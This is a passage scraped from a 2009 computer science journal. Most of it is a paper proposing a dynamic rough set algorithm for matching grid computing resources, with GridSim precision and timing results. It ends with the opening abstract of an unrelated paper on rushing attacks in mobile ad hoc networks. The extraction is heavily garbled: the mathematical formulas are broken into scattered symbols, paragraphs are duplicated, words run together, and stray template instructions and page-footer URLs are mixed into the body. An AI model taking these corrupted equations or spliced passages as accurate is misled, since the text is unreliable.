been made between DRSRD, classical rough set theory based
algorithm, and UDDI and OWL-S combined algorithm. DRSRD
shows much better precision for the cases with vagueness and
uncertainty in a dynamic system such as the grid rather than the
classical rough set theory based algorithm, and UDDI and OWL-
S combined algorithm.
Keywords- Grid, Rough Set; Dynamic rough set; Resource
Discovery; Ontology; UDDI; OWL-S
I. I NTRODUCTION (H EADING 1)
Nowadays, Grid is considered as a service-oriented computing
infrastructure [1]. Open Grid Services Architecture (OGSA)
[2], which has been promoted by Global Grid Forum, has been
used for dealing with service-oriented problem [3].Many resources such as workstations, clusters, and
mainframes with various properties such as main memory,
CPU speed, bandwidth, virtual memory, hard disk, operating
system, CPU vender, number of CPU elements etc are joining
and leaving the grid environment. On the Other hand manyusers want to use these resources to run their jobs with different
requirements. But there are always differences between which
a user requested and whitch have been registered in a grid GIS.To solve this vagueness and uncertainty we use rough set
theory, proposed by Z. Pawlak in 1982 [4], which has been
used in vast area of computer science such as data mining,
pattern recognition, machine learning and knowledge
acquisition etc [5].
One of the first methods that can be used for service discovery
is UDDI which is used for web service publication anddiscovery. The current web service discovery mechanism is
based on the standard of UDDI [6]. In UDDI, XML is used to
describe data in business services. UDDI process Searchs
queries according to keywords and classification information.
There is limitation with the discovery mechanism of UDDI.
Firstly, machine can read XML data, but it can not understandXML data. Different query keywords may be semantically
equivalent, whereas UDDI can not infer any information fromkeywords or tModels it can easily make mistake. Secondly,
search by keywords and taxonomy is not suitable for web
service discovery. Furthermore, UDDI does not support search
by service capabilities and other properties [7]. This makes
UDDI search method a low precision method [6].
By advent of semantic web, services can be annotated withmetadata for enhancement of service discovery. One of the
earliest to add semantic information is DAML-S [8]. DAML-S
uses semantic information for discovering Web services.DAML-S uses ontological description to express web service
capacity and character.OWL-S is an OWL [9] based ontology for encoding properties
of Web services. OWL-S technology is used to facilitate
service annotation and matching. OWL-S ontology defines a
service profile for encoding a service description, a servicemodel for specifying the behavior of a service, and service
grounding for how to invoke the service. Actually, by using
domain ontology descried in OWL, using special software suchas protégé [10], a service discovery process involves a
matching between the profile of a service advertisement and
the profile of a service request. The service profile describes
the functional properties such as inputs, outputs, preconditions,and effects, and non functional properties such as service name,
service category, and aspects related to the quality of service.
In [11] a quantification standard for semantic service matching
has been presented that modifies the classical matchingalgorithm based on OWL-S. Matching algorithm has used the
quantification standard of service matching and OWL-WS. In
[12] service composition algorithm has constructed amathematical model and converted it to the shortest path
problem in order to find process that can satisfy customer need
in best conditions.
173 ISSN 1947 5500
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 180/215
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4, No.1, 2009
In [7] an approach has been developed for integrating semantic
features into UDDI. The approach uses a semantic matchmaker that imports OWL-S based semantic markups and service
properties into UDDI. The combination of OWL-S and UDDI
shows there could be a service discovery which supports webservice expression while UDDI is used. The matchmaker,
therefore, enables UDDI to store semantic information of web
services and process service search queries based on semantic
similarity of web service properties [7].The above-mentioned methods facilitate service discovery insome way. However, when matching service advertisements
with service requests, these methods assume that service
advertisements and service requests use consistent properties todescribe relevant services. But for a system such as Grid with a
large number of resources and users which have their own
predefined properties to describe services, it can't be true that
service advertisements and service requests use consistent
properties to describe services. In other words, some properties
may be used in service advertisement that may not be used byservice request. So, an approach must be taken into
consideration to deal with uncertainty of service properties
when matching service advertisements with service requests.Rough set theory is a new mathematical theory which deals
with uncertainty and vagueness [13]. In addition to the use of
rough set theory, we use service ontology to describe resources
in a classified form. This ontology has been made according to
the Karlsruhe ontology model [10].The remainder of this paper is organized as fallows. Part II is a
description of rough set theory, part II is a description of the
algorithm implemented and used in this paper, part IV is acomparison of our algorithm with UDDI and OWL-S
combined model proposed in [14] and rough set based
matchmaking algorithm [18], and finally part V is the
conclusion and future works.
II. R ELATED WORKS
While the grid environment moves towards a service-oriented
computing infrastructure, service discovery is becoming a vital
part of this environment. One of the earliest methods for service publication and discovery is UDDI which only
supports keyword matches and does not support any semantic
service. DAML-S is the earliest to add semantic information
for discovering web services [15]. DAML-S offers enoughsemantic information expressing Web service capacity and
character with ontological description of web services. In past
few years, a great amount of studies have been carried out on
the basis of OWL-S, such as semantic expression service bundling [16], ontology-based service matching [16], OWL-S
and UDDI combination [14]. In the [17] a metric is proposed
to measure the similarity of semantic services annotated with
OWL ontology. Similarity is calculated by defining theintrinsic information value of a service description based on
the inferencibility of each of OWL constructs. All the above
methods do not support uncertainty in properties. Rough set
theory is used for dealing with vagueness and missing data inlarge variety of domains. So, compared with the work
mentioned above, rough set theory can tolerate uncertain
properties in matching resources. In [18] we have proposed a
rough set based algorithm to deal with uncertainty and
vagueness. In this paper, our algorithm works in two steps.The First step is dependent properties reduction which
removes dependent properties. The Second step is
matchmaking which matches and ranks resources according to
requested resource.
III. CLASSICAL R OUGH SET THEORY
Rough set theory which is proposed by Pawlak, in 1982, has
been proved to be a good mathematical tool to describe andmodel uncertainty and imprecision. It has been widely applied
in artificial intelligent, pattern recognition, data mining, fault
diagnostics etc [19]. There are many advantages of rough sets
theory; for example, no preliminary or additional information is
needed and only the facts in the data are considered.
Fig. 1 [18] shows that rough set is based on the concept of anupper and a lower approximation of a set. For a given set X the
yellow grids represent its upper approximation of set X, and the
green grids represent the lower approximation of set X and the black line represents the boundary region of set X.
Let:• U: a set of N registered resources, U= {u1,
u2, …, u N }, N ≥1.
• P: a set of M properties used to describe the N registered
resources of the set U, P = {p1, p2, …,
pM} , M≥2.
• Q: a set of M registered resource properties relevant to a
resource request R in terms of resource ontology whose
irrelevant properties have been removed,
Q = {q1, q2, …, qK } , K ≥1, and Q is a subset of P.
• R: a set of L requested resource properties with their
weights,
R={(r 1,w1), (r 2,w2), …, (r L,wL)}, L ≥ 1.
Figure 1. Approximation in rough set theory
174 ISSN 1947 5500
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 181/215
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4, No.1, 2009
According to the rough set theory for a given set X there are:
[ ] }{ X X x X Q Q ⊆= (1)
[ ] }{ φ ≠∩= X X x X Q Q (2)
In which X Q is the lower approximation and X Q is the
upper approximation of X in terms of properties set Q. X is a
subset of U and Q is a sub set of P.
U X ⊆ PQ ⊆
So for a property , we can say that:Qq ∈• , X Q x ∈∀ x definitely is a member of X and definitely
has property q.
• X Q x ∈∀ , x probably is member of X and probably has
property q.
X U x −∈∀ , x absolutely is not a member of X and
absolutely does not have property q.
The Most important part of rough set theory is attribute
reduction. Some attributes are dependent on other attributes in
attributes set, so they are not necessary to be considered inmatching phase. According to rough set theory we are:
Υ DU X
C X C DPOS/
)(∈
= (3)
α =U
X C DC =),(γ (4)
In Which C and D are subsets of property set P. as shown in
[13], D totally depends on C if α =1 Or D partially (in a
degree of α ) depends on C if 1<α .
Since existing works need to find exact match between
requested resources and registered resources, it is difficult tofind exact matching. So by using rough set theory, the need of
exact match has been removed.
IV. DYNAMIC R OUGH SET THEORY
Although rough set theory is being used in various ranges of
research such as data mining, pattern recognition, decisionmaking and expert system, it is suitable for static knowledge
and data. In fact, in a classical rough set theory, subset X of
universal set U is a static set without considering the dynamicfeatures it can have. In the real word, most information
systems have dynamic features so that the rate of participant
and disappearance of entities in these systems is high.
Whereas Pawlak’s rough set theory can only deal with static
information system, using a dynamic method to deal with
uncertainty and process information system will have more
efficiency.By using dynamic rough set theory, considering dynamic
features of an information system will be possible. Dynamicrough set theory uses outward and inward transfer parameters
to expand or contract X set in classical rough set.
According to [20], dynamic rough set theory has been defined
as follows:
Suppose A= (U, P) is an information system, and
. For any , we have:
PT ⊆U X ⊆ U x ∈
Xxas,][
][)(),( ∈
−=−
T
T
T X x
X x x ρ (5)
X~xas,][
][1)(),( ∈
−−=+
T
T
T X x
X x x ρ (6)
)(),( xT X
− ρ
)( ∈+ X d T
is called outward transfer coefficient and is
called inward transfer coefficient of element x about T. In real
computation, outward and inward transfer coefficients are been choose as constant amounts. In fact and
are outward transfer standard and inward
transfer standard of elements of X about T, respectively.
)(),( xT X
+ ρ
]1,0[∈)(− X d T
]1,0[
Inflated dynamic main set of X is defined as below:
}.1)(),(~{)( ),( <≤∈= +++T X T T X d X x x X M ρ (7)
And inflated dynamic assistant set is defined as:
)}.(0),(~{)( ),( X d X x x X A T T X T +++ <≤∈= ρ (8)
+T X is called inflated dynamic set of X about T and defined as:
).( X M X X T T ++ = Υ (9)
The formulas (5-9) show that we can expand X according to T.we can also contract X according to T. for this reason we
have:
}.1)()(,{)( ),( <≤∈= −−− X X d X x x X M T X T T ρ (10)
In which is defined as contracted dynamic set of X
about T and also contracted dynamic assistant set is defined
as:
)( X M T −
)}.()(0,{)( ),( X d X X x x X A T T X T −−− <≤∈= ρ (11)
And called contracted dynamic set is defined as:−T X
. (12)−−
−= T T M X X According to the above mentioned, we can expand and
contract X according to T. Suppose we have T and PT ⊆′ ,
two direction dynamic set of X according to the T and T ′ is
defined:
).())((*),( X M X M X X T T T T
+−′ −= Υ (13)
Suppose , we can compute upper and lower
approximation of X sing equations (1, 2) so that we have:
PQ ⊆*
),( T T ′ u
}.][,{)( *),(
*),( T T QT T X xU x x X Q ′′ ⊆∈= (14)
}][,{)( *),(
*),( T T QT T X xU x x X Q ′′ ∈= Ι (15)
and )(*),( X Q T T ′ )(*
),( X Q T T ′ are called two d sfer D-
lower app ation set
increase resources (X)
irection tran
roxim and two direction transfer D-upper approximation set of X, respectively.
In fact according to )( X M T + we should
which can have opp y of selection according to the
attributes set T, but )( X M T −
′ indicates according to the
attributes set
ortunit
T ′ we shou se X.ld decrea
175 ISSN 1947 5500
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 182/215
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4, No.1, 2009
)(*
),( X Q T T ′ indicates the objects of the optimization of the
candidate set which can be considered as a candidate set for matchmaking process. So in the matchmaking phase we only
need to search D-lower approximation set ( )(*
),( X Q T T ′ ) in order
to select resources which satisfy requested service.
In this work, we can also determine the priority of each
requested service property, so that if properties T have an
important role, their priority factor is high, we can decrease
and this means that we expand candidate set X according
to the properties set T. when T plays a less important role,
priority of properties is low, we can decrease in order to
contract the candidate set.
+T d
′−
′T d
V. RESOURCE DISCOVERY
GridSim simulator has been used in order to simulate
Dynamic Rough Set Resource Discovery Algorithm(DRSRD). As shown in Fig. 2, user sends a service request to
the GridSim’s Broker, Broker forwards the request to the GIS
which can access Advertised Resource Repository and
Ontology template in order to get resources which satisfyrequested service. GIS has two components in order to find
resources satisfying requested service. First component is
Candidates Optimization which uses dynamic rough set theory
in order to determine the optimum set of candidate resources.User defines a priority factor called Wi for each of the
requested service properties in order to determine their
priority. Candidate optimization component determines
candidate resources set according to the priority of requestedservice properties.
Figure 2. Algorithm outline
The Second component is the Matchmaking component whichdoes the matchmaking algorithm on the candidate resources
set obtained from the candidates optimization component.
For describing resource properties, we have used a resource
ontology template based on the Karlsruhe ontology model
[10]. The resource ontology template, as shown in Fig. 3 [23],
has been created by considering the most possible computingresources in the Grid. The concept of these resources has been
defined properly using relations and properties so that the
characteristics of any resource can be defined by their
properties. For using the ontology template in the GridSim,which is a java base simulator, we have used the protégé-
OWL API, which is a java base API, in order to create and
modify Ontology dynamically.In this section we will describe the candidate optimizationcomponent and matchmaking component.
For describing resource properties, we have used a resource
ontology template based on the Karlsruhe ontology model
[10]. The resource ontology template, as shown in Fig. 3 [23],has been created by considering the most possible computing
resources in the Grid. The concept of these resources has been
defined properly using relations and properties so that the
characteristics of any resource can be defined by their
properties. For using the ontology template in the GridSim,which is a java base simulator, we have used the protégé-
OWL API, which is a java base API, in order to create and
modify Ontology dynamically.In this section we will describe the candidate optimization
component and matchmaking component.
Figure 3. Ontology template
According to the method proposed in [14] there are four
relations between pR and pA , in which pR and pA arerespectively a property for the resource request and a property
for the registered resource. These four relations are as follow:
• Exact match, pR and pA are equivalent or pR is a
subclass of pA.• Plug in match, pA subsumes pR .
• Subsume match, pR subsumes pA.
• No match, no subsumption between pR and pA.
Each property in the advertised resources properties set will be
compared to all of the properties in the resource request properties set. Each property in the advertised resources that
has no match relationship with any of properties in the
resource request will be treated as an irrelevant property and
176 ISSN 1947 5500
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 183/215
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4, No.1, 2009
must be marked up. This step must be repeated until all the
properties in the registered resources have been checked. Themarked up properties should not be used in the Candidates
Optimization Component.
After the reduction of irrelevant properties, the remained properties will be sent to the Candidates Optimization
Component entity to optimize candidates set.
A. Candidates Optimization
The Most important aim of dynamic rough set theory is todeal with the vagueness and uncertainty in a knowledge systemwhich changes dynamically. For a system such as the Gridwhose resources can join or leave the system randomly, usingdynamic rough set theory is more efficient than classical roughset theory.
User sends its service request to the Broker. In this request,each one of the requested service properties has a weight Wi.Broker forwards this request to the Grid Information Service(GIS) in order to find the best resources which satisfy the
requested service. After getting the request by GIS, it classifiesthe requested properties according to their weight. Accordingto part III, the set R is the requested resource properties and the
properties set T, which , is defined as bellow: RT ⊆
.11 },5.0and),(),({ Liw Rwr wr T iiiii ≤≤≥∈=
In fact the set T contains properties with priority factor (weight) more than 0.5.
As mentioned in part IV the candidate set can be expandedaccording to the properties set T. According to the weight of requested service properties, we define the inward transfer
standard as follows:)( X d T
+
T wt whichT
w
X d ii
L
i
i
T ∈=
∑=+ ),( ,)(
1
1 (16).
The properties setT ′ , in which , are defined as a
set of properties the weight of which is less than 0.5. So
RT ⊆′T ′ is
defined as:
.21 },5.0and),(),({ Liw Rwr wr T iiiii ≤≤<∈=′
The outward transfer standard is defined as bellow:)( X d T −
′
T wt whichT
w
X d ii
L
i
i
T ′∈′
=∑=−
′ ),( ,)(
2
1 (17).
The candidates set X is defined as a set of resources withmaximum non empty properties according to the requestedresource properties. And ~X is defined as all resources in theuniversal set U which are not contained in the X.
Candidates Optimization algorithm is shown in the Fig. 3.Algorithm uses three steps to compute candidates optimizedset.
Input: requested properties set R={(r1,w1), (r2,w2),
…,(rL,wL)}.
Input: candidates set X.
Output: candidates optimized set.
I: Inflated dynamic main set of X aboutT .
C: contracted dynamic set of X about T ′ .
* X : Two direction dynamic set of X according to the
T andT ′ .
* X : Lower approximation of
* X according to requested
resource properties R.
Step 1:
Compute and . )( X d T + )( X d T
−′
Step 2:
For all X x ~∈
If ≥ )(),(
xT X
+ ρ )( X d
T +
Add x to the I.
End for.
For all X x ∈
If )()(),( X d x T T X −
′−
′ ≥ ρ
Add x to the C.
End for.
Step 3:
. I C X X Υ)(* −=
Step 4:
Compute*
X according to the R.
Return*
X .
Figure 4. Candidates Optimization algorithm
Step 1 calculates and using the equations
(16) and (17) respectively. In step 2, the inflated dynamic mainset of X and contracted dynamic main set of X using equations(7) and (10) respectively.
)( X d T + )( X d T
−′
Step 3 calculates two direction dynamic set of X according
to T and T ′ using equation (13). Candidates set X can beexpanded according to the properties set T which has propertieswith higher priority and can be contracted according to the
properties set T ′ the properties of which have lower priority.In Step 4, by using equation (14), the lower approximation set
Identify applicable sponsor/s here. (sponsors)
177 ISSN 1947 5500
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 184/215
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4, No.1, 2009
* X of *
X is calculated according to the requested resource
properties set R. In fact, * X is the set of resources that are most
likely to be selected as the matched resources.
B. Resource Matchmaking
After optimization of the candidates set we should only
apply the matchmaking algorithm on the optimized candidatesset. Reduction of the candidates set causes the reduction of searching time.
We design the matching resource algorithm according tothe rules proposed in [14] and in regarding to the ontologytemplate.
We define m(r i, q j) as the match degree of the requestedresource property r i and the advertised resource property q j. Inthis algorithm properties are divided in the two classes. Thefirst class is properties with String type. For this class of
properties if q j is an exact match with r i the match degree is 1.0.But if q j is a plug in match with r i with a match generation of d:
⎪⎩
⎪⎨⎧
>=≤≤×−−=
5d 5.0),(
5d2 )1.0)1((1),(
ir jqm
d ir jqm
For the case of the subsume match if q j is a subsume matchwith r i with the match generation of d:
⎪⎩
⎪⎨⎧
>=
≤≤×−−=
3d 5.0),(
3d1 )1.0)1((8.0),(
ir jqm
d ir jqm
An advertised property with empty value is regarded as null property. For any null property q j the match degree is 0.5.
The second class is properties set with Non string type. Thisclass contains properties with type integer, long integer and
double. For this class if type of both properties is equal, matchdegree is defined by:
⎪⎩
⎪⎨⎧
>=
≤×−=
5)(/)( 5.0),(
5)(/)( )1.0)(/)((1),(
ir V jqV ir jqm
ir V jqV ir V jqV ir jqm
In which V(q j) is the value of attribute q j.
Fig. 5 shows conditions for calculating the match degree.
For calculating the match between the requested resourceand the advertised resource we have used the equation (18)which calculates the maximum match degree between therequested resource and the advertised resource.
∑∑ ∑== =
×= L
i
i
L
i
i
K
j
i j A R R M ,( wwr qm MAX R11 1
))),((()(18).
In the formula (18), the symbols R R and R A are therequested resource and the advertised resource respectively.
According to this algorithm, matched resources can beranked according to their match degree. Ranking process isdone according to the priority of properties.
For each &&Q jq ∈ null jqV ≠)(
For each Rir ∈
If type of both && is string jq ir
If is an exact match with jq ir
.0.1),( =ir jqm
Else if is an plug in match with and match jq ir
degree d
If 2 ≤ d ≤ 5
. 1.0)1(1),( ×−−= d ir jqm
Else if d>5
.5.0),( =ir jqm
Else if is an subsume match with jq ir
If is subclass of jq thd ir
If 1≤d≤3
.1.0)1(8.0),( ×−−= d ir jqm
Else if d >3
.5.0),( =ir jqm
Else if type of both && is not string and is jq ir
equal
If
5)(/)(≤
i j r V qV
)1.0*)()((1),( ir V jqV ir jqm −= .
Else
.5.0),( =ir jqm
End for
End for
For each &&Q jq ∈ null jqV =)(
For each Qiq ∈
.5.0),( =ir jqm
End for
End for
Figure 5. match degree algorithm
According to this algorithm, matched resources can beranked according to their match degree. Ranking process isdone according to the priority of properties.
178 ISSN 1947 5500
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 185/215
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4, No.1, 2009
VI. EXPERIMENTAL RESULTS
In order to simulate algorithm we run the GridSim that is agrid java based simulator. We have also used db4o [22] data
base as a repository for advertised resources. We have createdontology of possible resources using protégé API [10], which isa java based API, for semantic description of resources. Thestructure of the ontology of resources is motivated by the needto provide information about resources. The resource ontology
proposed in this paper takes most of computing resources intoaccount. This ontology template has been created according tothe basis of Karlsruhe Ontology model [23].
In order to test our algorithm we simulated 10000 resourceswhich are semantically defined according to the ontologytemplate shown in Fig. 3. Each resource register itself at thedatabase as soon as joined the grid by sending its featureswhich are defined according to the ontology template. For designing Query generator we created users which sendresource requests with deferent requested resource property.Requested resource properties are defined according to theontology template.
As shown in Fig. 6, user sends its resource request to the
GridSim’s broker. Broker forwards this resource request to theGrid Information Server (GIS). The GIS uses ontology andaccesses the database in order to find advertised resourcesrelevant to the requested resource. Retrieved resources IDalong with its match degree are sent back to the user.
Figure 6. GridSim Architecture
We have tested our algorithm with resource propertycertainty of 30%, 50%, 80%, and 100% and for each of thesestates we have run simulator with deferent number of advertised resources. We have used average results of 100times run of each case for comparison.
For evaluating precision and matching time of our algorithm we compared this algorithm with the algorithm
proposed in [14] which is a combination of UDDI and OWL-Sand rough set based algorithm proposed in our previous work [18].
A. Precision evaluation
As mentioned above we test our algorithm with 4 groups of advertised resources. The First group has only 30% propertiescertainty. The Second group has 50% property certainty andthe third group has 80% property certainty and the fourth grouphas 100% property certainty. Fig. 7 to Fig. 13 show the
comparison of the precision for different numbers of theresources. Precision is defined as the ratio of the number of correct retrieved resources rather than all the retrievedresources. According to matching algorithm proposed in [14],UDDI and OWL-S matching algorithm can not deal withuncertainty.
0%
20%
40%
60%
80%
100%
30% 50% 80% 100%
p r e c i s i o n
properties certainty rate
rough set based algorithm UDDI and OWL-S DRSRD
Figure 7. comparison of precision for 500 resources
0%
20%
40%
60%
80%
100%
30% 50% 80% 100%
p r e c i s i o n
properties certainty rate
rough set based algorithm UDDI and OWL-S DRSRD
Figure 8. comparison of precision for 1000 resources
0%
20%
40%
60%
80%
100%
30% 50% 80% 100%
p r e c i s i o n
properties certainty rate
rough set based algorithm UDDI and OWL-S DRSRD
Figure 9. comparison of precision for 2000 resources
179 ISSN 1947 5500
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 186/215
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4, No.1, 2009
0%
20%
40%
60%
80%
100%
30% 50% 80% 100%
p r e c i s i o n
properties certainty rate
rough set based algorithm UDDI and OWL-S DRSRD
Figure 10. comparison of precision for 4000 resources
0%
20%
40%
60%
80%
100%
30% 50% 80% 100%
p r e c i s i o n
properties certainty rate
rough set based algorithm UDDI and OWL-S DRSRD
Figure 11. comparison of precision for 6000 resources
0%
20%
40%
60%
80%
100%
30% 50% 80% 100%
p r e c i s i o n
properties certainty rate
rough set based algorithm UDDI and OWL-S DRSRD
Figure 12. comparison of precision for 8000 resources
0%
20%
40%
60%
80%
100%
30% 50% 80% 100%
p r e c i s i o n
properties certainty rate
rough set based algorithm UDDI and OWL-S DRSRD
Figure 13. comparison of precision for 10000 resources
As shown in the above figures, the precision of thecombination of UDDI and OWL-S is lower than DynamicRough Set Resource discovery (DRSRD) algorithm for 30%,50%, and 80% of service property certainty. This is because of disability of UDDI and OWL-S in dealing with uncertainty.
Also the precision of DRSRD is more than rough set basedalgorithm. This is because of the dynamic features of the Gridenvironment. Whereas classic rough set theory can not dealwith dynamic features, rough set based algorithm has low
precision. By increasing the certainty, deference betweenUDDI and OWL-S combined algorithm and DRSRD algorithmis being decreased so that with 100% certainty the precision of
both of two algorithms reaches 100%. But for different rates of
certainty, DRSRD is more precise than rough set basedalgorithm. It is clear that DRSRD has a good effect on dealingwith vagueness and dynamic features of grid.
0%
20%
40%
60%
80%
100%
500 1000 2000 4000 6000 8000 10000
number of resources
p r e c i s i o n
r ough s et bas ed algor ithm UDDI and OWL- S DRSRD
Figure 14. Precision increment for 30% certainty rate
0%
20%
40%
60%
80%
100%
500 1000 2000 4000 6000 8000 10000number of resources
p r e c i s i o n
rough set based algor ithm UDDI and OWL-S DRSRD
Figure 15. Precision increment for 50% certainty rate
0%
20%
40%
60%
80%
100%
500 1000 2000 4000 6000 8000 10000
number of resources
p r e c i s i o n
rough set based algor ithm UDDI and OWL-S DRSRD
Figure 16. Precision increment for 80% certainty rate
180 ISSN 1947 5500
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 187/215
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4, No.1, 2009
0%
20%
40%
60%
80%
100%
500 1000 2000 4000 6000 8000 10000
number of resources
p r e c i s i o n
rough set bas ed algor ithm UDDI and OWL- S DRSRD
Figure 17. Precision increment for 100% certainty rate
Fig. 14 to Fig. 17 show the increment of precisionaccording to the increment of the number of the resources for 30%, 50%, 80%, and 100% certainty rate, respectively. Alongwith the increase of the number of resources, precision alsoincreases. It is because of the increasing of the survey
population. Define abbreviations and acronyms the first timethey are used in the text, even after they have been defined in
the abstract. Abbreviations such as IEEE, SI, MKS, CGS, sc,dc, and rms do not have to be defined. Do not use abbreviationsin the title or heads unless they are unavoidable.
B. Matching time evaluation
For evaluating matching time we run our simulator 100times with different amount of advertised resources. We havecompared DRSRD algorithm with rough set based algorithmand UDDI and OWL-S combined model to evaluate thematching time of our algorithm.
0
5000
10000
15000
20000
25000
m a t c h i n g t i m e ( m s )
number of resources
rough set based algorithm UDDI and OWL-S DRSR
Figure 18. Comparison of the matching time
Fig. 18 shows that the matching time of DRSRDalgorithm is lower than UDDI and OWL-S when the number of advertised resources is under 9000. By increasing the number of advertised resources UDDI and OWL-S combined model ismore effective because its matching time depends on number of properties rather than number of advertised resources. It isalso clear that DRSRD has lower matching time rather thanrough set based algorithm.
VII. CONCLUSION AND FUTURE WORK
In this paper we have shown dynamic rough set based
algorithm has a good effect in dealing with uncertainty and
vagueness for resource matching in a dynamic environmentsuch as grid. Using classic rough set theory in order to deal
with vagueness is effective but it is only for static data.
Whereas grid is a dynamic environment and features of resources change dynamically, we need to use a dynamic
method to deal with vagueness, so we have used dynamic
rough set theory. DRSRD algorithm can deal with uncertain
properties and find a set of resource which may maximally
satisfy the needs of requested resource. In fact, our algorithmcan find a list of resources which have high degree of
matching according to the weight of requested properties.
Experimental results have shown that the DRSRD algorithm ismore effective in resource matching than rough set based
algorithm and UDDI and OWL-S combined algorithm.
Algorithm time for our algorithm is lower than rough set based
algorithm. It is also lower than UDDI and OWL-S algorithm
for resources number less than 9000 resources.
R EFERENCES
[1] M. Li and M.A.Baker, the Grid Core Technologies, Wiley, 2005.
[2] Open Grid Services Architecture (OGSA), http://www.globus.org/ogsa.
[3] Global Grid Forum (GGF), http://www.ggf.org
[4] Dong Ya Li, Bao Qing Hu, A Kind of Dynamic Rough Sets, fskd,pp.79-85, Fourth International Conference on Fuzzy Systems and KnowledgeDiscovery (FSKD 2007) Vol.3, 2007.
[5] Keqiu Li, Deqin Yan, Wenyu Qu, Modifications to Bayesian Rough SetModel and Rough Vague Sets, apscc,pp.544-549, The 2nd IEEE Asia-Pacific Service Computing Conference (APSCC 2007), 2007.
[6] Tian Qiu, Lei Li, Pin Lin, Web Service Discovery with UDDI Based onSemantic Similarity of Service Properties, skg,pp.454-457, ThirdInternational Conference on Semantics, Knowledge and Grid (SKG2007), 2007.
[7] Yue Kou, Ge Yu, Derong Shen, Dong Li, Tiezheng Nie: PS-GIS: personalized and semantics-based grid information services. Infoscale2007.
[8] BursteinM, Lassila. DAML-S semantic markup for Web services InProc.of the International Semantic Web Workshop, 2001.
[9] D. Martin, M. Burstein, J. Hobbs, O. Lassila, D. McDermott, S.McIlraith, S. Narayanan, M. Paolucci, B. Parsia, T. Payne, E. Sirin, N.Srinivasan, and K. Sycara, “OWL-S: Semantic Markup for WebServices”, http://www.w3.org/Submission/2004/SUBM-OWL-S 20041122/, 2004.
[10] Protégé, http://www. protege.stanford.edu/plugins/owl/.
[11] S. Bechhofer, F. Harmelen, J. Hendler, I. Horrocks, D. McGuinness, P.F. Patel-Schneider, and L. A. Stein. OWL Web Ontology LanguagReference. W3C Recommendation, Feb. 2004.
[12] S. Miles, J. Papay, V. Dialani, M. Luck, K. Decker, T. Payne, and L.
Moreau. Personalised Grid Service Discovery. IEE ProceedingsSoftware: Special Issue on Performance Engineering, 150(4):252-256,August 2003.
[13] J. Komorowski, Z. Pawlak, L. Polkowski, and A. Skowron, Rough Sets:a tutorial, Rough Fuzzy Hybridization, Springer, pp. 3-98, 1999.
[14] M. Paolucci, T. Kawamura, T. Payne, and K. Sycara. Semanticmatching of web service capabilities. Proceedings of 1st InternationalSemantic Web Conference. (ISWC2002), Berlin, 2002.
[15] T. Chen, X. Zhou, N. Xiao, A Semantic-based Grid Service Discoveryand Composition, Page(s):527 – 530, Third International Conference onSemantics, Knowledge and Grid, Oct. 2007.
181 ISSN 1947 5500
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 188/215
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4, No.1, 2009[16] Qi Yong, Qi Saiyu, Zhu Pu, Shen Linfeng, Context-Aware Semantic
Web Service Discovery, skg, pp.499-502, Third InternationalConference on Semantics, Knowledge and Grid (SKG 2007), 2007.
[17] Hau, J., W. Lee, and J. Darlington, a Semantic Similarity Measure for Semantic Web Services, in Web Service Semantics Workshop 2005,Japan.
[18] I. Ataollahi, M. Analoui(in press), Resource discovery using rough set inGrid environment, 14th International CSI conference (CSICC2009), July1-2, 2009, Tehran, Iran.
[19]
E. Xu, Shaocheng Tong, Liangshan Shao, Baiqing Ye. Rough SetApproach for Processing Information Table. In Proceeding of SNPD(3)’2007.pp.239~243.
[20] Dong Ya Li , Bao Qing Hu, A Kind of Dynamic Rough Sets,Proceedings of the Fourth International Conference on Fuzzy Systems
and Knowledge Discovery (FSKD 2007) Vol.3, p.79-85, August 24-27,2007.
[21] www.annauniv.edu/care/downloads/SemanticGrid/Presentation/Basic_Pr esentation-cdac_1.ppt.
[22] http://www.db4o.com/about/productinformation/resources/db4o-4.5-tutorial-java.pdf .
[23] http:\\www.aifb.uni-karlsruhe.de/WBS/sst/Research/Publications/KI-Heft-KAON-Survey-2003.pdf.
182 ISSN 1947 5500
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 189/215
Impact of Rushing attack on Multicast in
Mobile Ad Hoc Network
V. PALANISAMY1, P.ANNADURAI
2,
1 Reader and Head (i/c), Department of Computer Science & Engineering,Alagappa University, Karaikudi, Tamilnadu ,India
Email: vpazhanisamy@yahoo.co.in2
Lecturer in Computer Science, Kanchi Mamunivar Centre for
Post Graduate Studies (Autonomous) , Lawspet, Puducherry, India.
Email: annadurai_aps70@yahoo.co.in
Abstract — A mobile ad hoc network (MANETs) is a self-
organizing system of mobile nodes that communicate witheach other via wireless links with no fixed infrastructure or
centralized administration such as base station or accesspoints. Nodes in a MANETs operate both as host as well asrouters to forward packets for each other in a multi-hop
fashion. For many applications in wireless networks,
multicasting is an important and frequent communicationservice. By multicasting, since a single message can bedelivered to multiple receivers simultaneously. It greatlyreduces the transmission cost when sending the same packetto multiple recipients.
The security issue of MANETs in group communicationsis even more challenging because of involvement of multiplesenders and multiple receivers. At that time of multicasting,mobile ad hoc network are unprotected by the attacks of
malicious nodes because of vulnerabilities of routing
protocols. Some of the attacks are Rushing attack, Blackholeattack, Sybil attack, Neighbor attack and Jellyfish attack.
